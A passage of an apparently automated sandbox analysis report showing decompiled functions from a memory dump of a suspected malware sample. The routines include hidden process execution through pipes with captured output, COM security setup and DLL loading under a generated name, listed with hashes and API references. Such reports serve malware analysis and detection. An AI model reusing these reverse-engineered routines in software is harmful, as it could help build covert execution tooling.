										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x9e688; // 0xb0000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E0008109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E000885D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xb0228
									_t153 = _t51;
									L25:
									_t90 = E0008553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x9e688; // 0xb0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E0008C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x9e684; // 0x28df8f0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x9e684; // 0x28df8f0
								 *((intOrPtr*)(_t109 + 0x30))();
								E0008861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E0008861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E0008E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E000895E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E000885D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E00082BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

0x00084a0b
0x00084a18
0x00084a23
0x00084a28
0x00084a2a
0x00084a2d
0x00084a32
0x00084a35
0x00084a3f
0x00084a41
0x00084a4e
0x00084a57
0x00084a57
0x00084a64
0x00084a7f
0x00084a86
0x00084a88
0x00084a8d
0x00084a92
0x00084a98
0x00084aa7
0x00084ac6
0x00084ac8
0x00084ace
0x00084ad4
0x00084ad9
0x00084add
0x00084ae0
0x00084aea
0x00084aec
0x00084aed
0x00084af8
0x00084afa
0x00084afd
0x00084b02
0x00084b09
0x00084b5e
0x00084b5e
0x00084b63
0x00084bca
0x00084bcf
0x00084bd1
0x00084bdb
0x00084be0
0x00084be0
0x00084bfa
0x00084bfc
0x00084bff
0x00084c01
0x00000000
0x00000000
0x00084c07
0x00084c11
0x00084c1a
0x00084c1f
0x00084c22
0x00084c28
0x00084c2e
0x00084c36
0x00084c38
0x00084c3b
0x00084c3c
0x00084c41
0x00084c44
0x00084c47
0x00084c49
0x00084c4d
0x00084c4d
0x00084c52
0x00084c55
0x00084c57
0x00084c5b
0x00084c5b
0x00084c62
0x00084c67
0x00084c69
0x00084c6d
0x00084c6f
0x00084c75
0x00084c79
0x00084c7c
0x00084c7d
0x00084c82
0x00084c85
0x00084c8a
0x00084cb2
0x00084cb8
0x00084cbf
0x00084cce
0x00084cd3
0x00000000
0x00084cd3
0x00084cc1
0x00000000
0x00084c8c
0x00084c8c
0x00084c91
0x00084c98
0x00084cdd
0x00084cdd
0x00084ce4
0x00084ce8
0x00084ce9
0x00084ce9
0x00084cf3
0x00084cf8
0x00084cfb
0x00084cfc
0x00084cfe
0x00084d00
0x00084d05
0x00084d0c
0x00084d4f
0x00084d0e
0x00084d13
0x00084d1b
0x00084d1f
0x00084d2a
0x00084d35
0x00084d3d
0x00084d41
0x00084d49
0x00084d49
0x00084d0c
0x00084d55
0x00084d58
0x00084d5a
0x00084d60
0x00084d60
0x00084d62
0x00084d62
0x00000000
0x00084d62
0x00084c9a
0x00084c9a
0x00084ca0
0x00084ca2
0x00084ca7
0x00084ca7
0x00084ca9
0x00084cd8
0x00000000
0x00084cd8
0x00084cab
0x00084ae4
0x00084ae4
0x00000000
0x00084ae4
0x00084c8a
0x00084b69
0x00084b77
0x00084b8a
0x00084b8f
0x00084b95
0x00084b97
0x00084baf
0x00084bb4
0x00084bbd
0x00084bc3
0x00000000
0x00084bc3
0x00084b9f
0x00084ba8
0x00000000
0x00084ba8
0x00084b0b
0x00084b11
0x00084b13
0x00084b51
0x00084b53
0x00000000
0x00000000
0x00084b55
0x00084b59
0x00000000
0x00084b59
0x00084b15
0x00084b1f
0x00084b2b
0x00084b36
0x00084b3d
0x00084b47
0x00084b4c
0x00000000
0x00084b4c
0x00084ae2
0x00000000
0x00084a66
0x00084a71
0x00084a77
0x00084a79
0x00084d64
0x00084d64
0x00084d66
0x00084d6c
0x00084d6c
0x00000000
0x00084a79

APIs

memset.MSVCRT ref: 00084A2D
lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D1F
lstrcatW.KERNEL32 ref: 00084D3D
lstrcatW.KERNEL32 ref: 00084D41
lstrcatW.KERNEL32 ref: 00084D49
lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D4F

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: ed2da3837245237ac08ea4ab6b2658944f206caf9fd02cc82a13b978fc3f41c6
Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
Opcode Fuzzy Hash: ed2da3837245237ac08ea4ab6b2658944f206caf9fd02cc82a13b978fc3f41c6
Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92

Uniqueness

Uniqueness Score: -1.00%

Function 0008D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 0008D75C
SysAllocString.OLEAUT32(?), ref: 0008D764
SysAllocString.OLEAUT32(00000000), ref: 0008D778
SysFreeString.OLEAUT32(?), ref: 0008D7F3
SysFreeString.OLEAUT32(?), ref: 0008D7F6
SysFreeString.OLEAUT32(?), ref: 0008D7FB

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000907F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

\u%04X\u%04X, xrefs: 00090950
@, xrefs: 00090865
\u%04X, xrefs: 00090911

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1

Uniqueness

Uniqueness Score: -1.00%

Function 0008D523, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E0008D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E00088604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
SysAllocString.OLEAUT32(00000000), ref: 0008D569
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 1610782348-0
Opcode ID: 032b65d1a8ed55fd57765c242025f7fd8b4177f10fda5a8d8732fc47c56a4ee4
Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
Opcode Fuzzy Hash: 032b65d1a8ed55fd57765c242025f7fd8b4177f10fda5a8d8732fc47c56a4ee4
Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30

Uniqueness

Uniqueness Score: -1.00%

Function 000921FF, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E000921FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L000922CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L00092291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x98250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L00092291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x98258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

APIs

localeconv.MSVCRT ref: 00092207
strchr.MSVCRT ref: 0009221A
_errno.MSVCRT ref: 00092229
strtod.MSVCRT ref: 00092237
_errno.MSVCRT ref: 00092264

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0008A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0008A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E0008861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x9e684; // 0x28df8f0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x9e684; // 0x28df8f0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E00088604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x9e684; // 0x28df8f0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x9e684; // 0x28df8f0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x9e684; // 0x28df8f0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x9e684; // 0x28df8f0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E000891A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E00089292(_t127);
						E0008861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E0008C379(_t127));
				_t98 =  *0x9e68c; // 0x28dfab8
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x9e684; // 0x28df8f0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x9e684; // 0x28df8f0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E00089256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E0008861A( &_v32, 0);
				return _t128;
			}

APIs

memset.MSVCRT ref: 0008A9F4
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Strings

D, xrefs: 0008AA4F

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateHeapPipe$AllocateFreememset
String ID: D
API String ID: 2365139273-2746444292
Opcode ID: 1ceeb7d8c3d5a21417e13ed379910f8f93468da184108a040cb9a8b4f2ffd76e
Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
Opcode Fuzzy Hash: 1ceeb7d8c3d5a21417e13ed379910f8f93468da184108a040cb9a8b4f2ffd76e
Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61

Uniqueness

Uniqueness Score: -1.00%

Function 0008C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x9e688; // 0xb0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E000895E1(_t50, 0xb62);
					_t66 =  *0x9e688; // 0xb0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
					_t20 =  *0x9e688; // 0xb0000
					asm("sbb eax, eax");
					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x9e688; // 0xb0000
					_t68 = E000892E5(_t26 + 0x1020);
					_v12 = _t68;
					E000885D5( &_v8);
					_t32 =  *0x9e688; // 0xb0000
					_t34 = E000892E5(_t32 + 0x122a);
					 *0x9e784 = _t34;
					_t35 =  *0x9e684; // 0x28df8f0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x9e784);
					 *0x9e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0008E171(0x9bb48, _t60);
					}
					 *0x9e780 = _t38;
					E0008861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x9e780 != 0) {
						goto L10;
					} else {
						E0008861A(0x9e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x9e780 == 0) {
						_t46 =  *0x9e6bc; // 0x28dfa18
						 *0x9e780 = _t46;
					}
					L10:
					return 1;
				}
			}

APIs

LoadLibraryW.KERNEL32 ref: 0008C5C6
memset.MSVCRT ref: 0008C605

Strings

dll, xrefs: 0008C588
%08x, xrefs: 0008C52F

Memory Dump Source

Source File: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: d0cc9968a293dd3dfd5a1183e1ba6c410fd70592b1cb07f3e9d2906c3aa602dc
Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
Opcode Fuzzy Hash: d0cc9968a293dd3dfd5a1183e1ba6c410fd70592b1cb07f3e9d2906c3aa602dc
Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725

Uniqueness

Uniqueness Score: -1.00%

Function 00092D70, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00092D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E00095D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E00094AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
